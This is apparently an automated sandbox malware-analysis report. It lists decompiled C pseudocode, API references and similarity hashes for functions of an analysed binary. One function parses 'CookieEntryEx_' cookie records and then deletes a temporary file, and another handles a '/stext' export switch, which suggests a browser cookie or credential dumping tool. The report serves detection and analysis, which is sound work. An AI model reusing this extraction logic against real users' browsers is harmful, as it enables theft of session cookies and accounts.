Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E490, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0x2120048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0x587208
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0x587a18
				if(_t3 != 0) {
					_push(_t3);
					L0040E032();
				}
				_t4 =  *0x41327c; // 0x587610
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}

0x0040e490
0x0040e497
0x0040e499
0x0040e49a
0x0040e49f
0x0040e4a0
0x0040e4a7
0x0040e4a9
0x0040e4aa
0x0040e4af
0x0040e4b0
0x0040e4b7
0x0040e4b9
0x0040e4ba
0x0040e4bf
0x0040e4c0
0x0040e4c7
0x0040e4c9
0x0040e4ca
0x00000000
0x0040e4cf
0x0040e4d0

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040E49A
??3@YAXPAX@Z.MSVCRT ref: 0040E4AA
??3@YAXPAX@Z.MSVCRT ref: 0040E4BA
??3@YAXPAX@Z.MSVCRT ref: 0040E4CA

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
Opcode Fuzzy Hash: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040BD40(void* __eax, void* __edx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t34;
				signed int _t43;
				intOrPtr _t54;
				intOrPtr* _t55;
				void* _t60;
				void* _t61;
				signed int _t65;
				intOrPtr _t66;
				void* _t71;

				_t60 = __edx;
				_t54 = 0;
				_t61 = __eax;
				_v4 = 0;
				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
				 *((intOrPtr*)(_t61 + 0x208)) = 0;
				_t71 = 0;
				_v16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
					L18:
					return _v4;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
						_t65 = 0x40f454;
					} else {
						_t33 = E00406306(_t33, _t54);
						_t65 = _t33;
					}
					_push(_t65);
					_push(L"/stext");
					L0040E03E();
					_pop(_t57);
					if(_t33 != 0) {
						_t34 = E0040BCAA(_t33, _t65);
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L8;
						}
						goto L7;
					} else {
						_t34 = _t33 + 1;
						L7:
						_v8 = _t34;
						_t10 = _t54 + 1; // 0x2
						_t71 = _t10;
					}
					L8:
					_t54 = _t54 + 1;
				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
				_t66 = _v8;
				if(_t66 > 0) {
					E0040B147(_t61, _t57, 0); // executed
					E0040A4C2(_t61);
					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
						_t43 = 0x40f454;
					} else {
						_t57 = _t71;
						_t43 = E00406306(_t42, _t71);
					}
					_t79 = _t66 - 8;
					if(_t66 != 8) {
						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
					} else {
						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
					}
					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
					_v4 = 1;
					if(_t55 != 0) {
						 *_t55 = 0x40f648;
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
						E00403F55(_t55 + 0xbf0);
						E0040623E(_t55 + 0xbd0);
						E0040623E(_t55 + 0xbac);
						E00406355(_t55 + 0xb98);
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
						E00403FBE(_t55 + 0x350);
						E004076F4(_t55);
						_push(_t55);
						L0040E032();
					}
				}
				goto L18;
			}

0x0040bd40
0x0040bd47
0x0040bd49
0x0040bd53
0x0040bd57
0x0040bd62
0x0040bd6b
0x0040bd70
0x0040bd74
0x0040be8c
0x0040be97
0x00000000
0x00000000
0x00000000
0x0040bd7a
0x0040bd7a
0x0040bd7a
0x0040bd83
0x0040bd90
0x0040bd85
0x0040bd87
0x0040bd8c
0x0040bd8c
0x0040bd95
0x0040bd96
0x0040bd9b
0x0040bda3
0x0040bda4
0x0040bda9
0x0040bdae
0x0040bdb0
0x00000000
0x00000000
0x00000000
0x0040bda6
0x0040bda6
0x0040bdb2
0x0040bdb2
0x0040bdb6
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040bdc2
0x0040bdc4
0x0040bdc8
0x0040bdce
0x0040bdd8
0x0040bddf
0x0040bde4
0x0040bded
0x0040bdf8
0x0040bdef
0x0040bdef
0x0040bdf1
0x0040bdf1
0x0040bdfd
0x0040be00
0x0040be16
0x0040be02
0x0040be07
0x0040be07
0x0040be1b
0x0040be23
0x0040be2b
0x0040be33
0x0040be39
0x0040be43
0x0040be4e
0x0040be59
0x0040be64
0x0040be6f
0x0040be79
0x0040be80
0x0040be85
0x0040be86
0x0040be8b
0x0040be2b
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040BD9B
??3@YAXPAX@Z.MSVCRT ref: 0040BE86

Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0

Strings

/stext, xrefs: 0040BD96

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??3@
String ID: /stext
API String ID: 3682227554-3817206916
Opcode ID: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
Opcode Fuzzy Hash: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403EAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403EAC(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t29 = _t28 & 0xfffffff8;
				_push(__ecx);
				_push(__ecx);
				_t9 = E004039F6(__edi); // executed
				_t24 = 0;
				_v8 = _t9;
				if(_t9 != 0) {
					L7:
					return _v8;
				}
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
					L5:
					E0040405E(_t22 + 4);
					_t27 = _t22 + 0x430;
					if( *_t27 != 0) {
						DeleteFileW(_t27); // executed
						 *_t27 =  *_t27 & 0x00000000;
					}
					goto L7;
				} else {
					goto L2;
				}
				do {
					L2:
					_t14 = E00403F2B(_t24, _t22 + 0x420);
					_push(0xe);
					_t18 = _t14;
					_push(L"CookieEntryEx_");
					_push(_t14);
					L0040E044();
					_t29 = _t29 + 0xc;
					if(_t14 == 0) {
						E00403BAF(_t21, _t22, _t18); // executed
					}
					_t24 = _t24 + 1;
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
				goto L5;
			}

0x00403eac
0x00403eac
0x00403eaf
0x00403eb2
0x00403eb3
0x00403eb8
0x00403ebd
0x00403ec1
0x00403ec5
0x00403f21
0x00403f2a
0x00403f2a
0x00403ecd
0x00403f02
0x00403f05
0x00403f0a
0x00403f14
0x00403f17
0x00403f1d
0x00403f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ecf
0x00403ecf
0x00403ed7
0x00403edc
0x00403ede
0x00403ee0
0x00403ee5
0x00403ee6
0x00403eeb
0x00403ef0
0x00403ef4
0x00403ef4
0x00403ef9
0x00403efa
0x00000000

APIs

Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77

_wcsnicmp.MSVCRT ref: 00403EE6

Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA

DeleteFileW.KERNELBASE(?), ref: 00403F17

Strings

CookieEntryEx_, xrefs: 00403EE0

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcslen$DeleteFile_wcsnicmp
String ID: CookieEntryEx_
API String ID: 3258848388-47494461
Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD

Uniqueness

Uniqueness Score: -1.00%

Function 00406785, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406785() {
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x413288 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41328c = 0x100;
					 *0x413290 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
					L0040E038(); // executed
					 *0x413270 = _t27;
					_t28 =  *0x41328c; // 0x100
					_t52 = 4;
					_t29 = _t28 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040E038();
					 *0x413278 = _t29;
					_t30 =  *0x41328c; // 0x100
					_t54 = 4;
					_t31 = _t30 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040E038();
					 *0x41327c = _t31;
					_t32 =  *0x413290; // 0x1000
					_t56 = 2;
					_t33 = _t32 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
					L0040E038(); // executed
					 *0x413274 = _t33;
					return _t33;
				}
				return _t25;
			}

0x00406785
0x0040678c
0x0040679b
0x0040679c
0x004067a1
0x004067a6
0x004067b0
0x004067be
0x004067bf
0x004067c4
0x004067c9
0x004067d2
0x004067d3
0x004067dc
0x004067dd
0x004067e2
0x004067e7
0x004067f0
0x004067f1
0x004067fa
0x004067fb
0x00406800
0x00406805
0x0040680e
0x0040680f
0x00406818
0x00406819
0x00406821
0x00000000
0x00406821
0x00406826

APIs

??2@YAPAXI@Z.MSVCRT ref: 004067BF
??2@YAPAXI@Z.MSVCRT ref: 004067DD
??2@YAPAXI@Z.MSVCRT ref: 004067FB
??2@YAPAXI@Z.MSVCRT ref: 00406819

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08

Uniqueness

Uniqueness Score: -1.00%

Function 0040567E, Relevance: 4.5, APIs: 3, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				short _v524;
				WCHAR* _t12;

				_t12 = __edi;
				if(GetTempPathW(0x104,  &_v524) == 0) {
					GetWindowsDirectoryW( &_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;
				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
				return _t12;
			}

0x0040567e
0x0040569d
0x004056a7
0x004056a7
0x004056ad
0x004056be
0x004056c8

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00405695
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}

0x00404077
0x00404081
0x00404084
0x0040408c
0x00404099
0x004040a2

APIs

SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Strings

F@@, xrefs: 0040408A, 00404097

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerRead
String ID: F@@
API String ID: 3154509469-234039029
Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004096FE, Relevance: 3.1, APIs: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t34;
				void* _t42;
				void* _t44;
				void* _t51;
				signed int _t54;
				intOrPtr* _t58;
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed
					}
					E004052A6();
				}
				return _v8;
			}

0x004096fe
0x004096fe
0x00409701
0x00409702
0x00409709
0x0040970b
0x0040970d
0x00409710
0x00409717
0x0040971c
0x00409722
0x0040972f
0x00409724
0x00409725
0x0040972a
0x0040972a
0x00409735
0x0040973a
0x004097e0
0x004097e2
0x00409740
0x00409743
0x00409748
0x00409753
0x00409755
0x0040974a
0x0040974a
0x0040974c
0x0040974c
0x0040975a
0x0040975b
0x00409760
0x00409763
0x0040976a
0x00409775
0x0040977d
0x0040977f
0x00409780
0x00409787
0x0040978a
0x00409792
0x00000000
0x00409794
0x00409794
0x00409799
0x0040979e
0x004097a7
0x004097b1
0x004097b7
0x004097b9
0x00000000
0x00000000
0x00000000
0x004097a7
0x00000000
0x004097a9
0x004097a9
0x004097aa
0x004097af
0x004097bf
0x004097c3
0x004097cf
0x004097d2
0x004097d2
0x004097d8
0x004097d8
0x004097ef

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 0040972F
FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004097D2

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59

Uniqueness

Uniqueness Score: -1.00%

Function 00404689, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t28;
				void** _t29;
				void* _t34;
				intOrPtr _t37;
				void* _t38;

				_t30 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t29 = __ecx;
				_v8 = 0x1388;
				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
				_t34 = _v16;
				if(E00404070(_t29, _t34, _a4) == 0) {
					_t37 = 0;
				} else {
					_t38 = _a8;
					if( *(_t34 + 0x24) != 1) {
						L6:
						__eflags =  *(_t34 + 0x24) & 0x00000004;
						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
							goto L4;
						} else {
							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
							_t37 = _a4;
						}
					} else {
						_t28 = E0040460C(_t30, _t29, _t34, _t38);
						_t44 = _t28;
						if(_t28 == 0) {
							goto L6;
						} else {
							_t25 = E00404689(_t29, _t44, _t28, _t38);
							L4:
							_t37 = _t25;
						}
					}
				}
				E00406710( &_v16);
				return _t37;
			}

0x00404689
0x0040468f
0x00404693
0x00404699
0x004046ab
0x004046b2
0x004046ba
0x004046c7
0x00404725
0x004046c9
0x004046cd
0x004046d0
0x004046fa
0x004046fa
0x004046fe
0x0040471e
0x00000000
0x00404700
0x0040470e
0x00404713
0x00404716
0x004046d2
0x004046d5
0x004046da
0x004046dc
0x00000000
0x004046de
0x004046e2
0x004046e7
0x004046e7
0x004046e7
0x004046dc
0x004046d0
0x004046ec
0x004046f7

APIs

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

memcpy.MSVCRT ref: 0040470E

Strings

F@@, xrefs: 00404697, 004046D4, 0040471D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@FilePointermemcpy
String ID: F@@
API String ID: 402491248-234039029
Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040536A, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040536A(void* _a4, void* _a8) {
				long _v8;
				int _t8;

				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
				return _t8;
			}

0x00405386
0x0040538d

APIs

wcslen.MSVCRT ref: 00405377
WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritewcslen
String ID:
API String ID: 3657313286-0
Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406729, Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406729(signed int __edi, signed int* __esi) {
				signed int _t4;
				signed int _t9;
				signed int* _t10;

				_t10 = __esi;
				_t9 = __edi;
				_t4 =  *__esi;
				if(_t4 != 0) {
					_push(_t4);
					L0040E032();
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
				}
				_push(_t9); // executed
				L0040E038(); // executed
				 *_t10 = _t4;
				_t10[1] = _t9;
				return 1;
			}

0x00406729
0x00406729
0x00406729
0x0040672d
0x0040672f
0x00406730
0x00406735
0x00406738
0x0040673c
0x0040673d
0x0040673e
0x00406743
0x00406748
0x0040674c

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406730
??2@YAPAXI@Z.MSVCRT ref: 0040673E

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
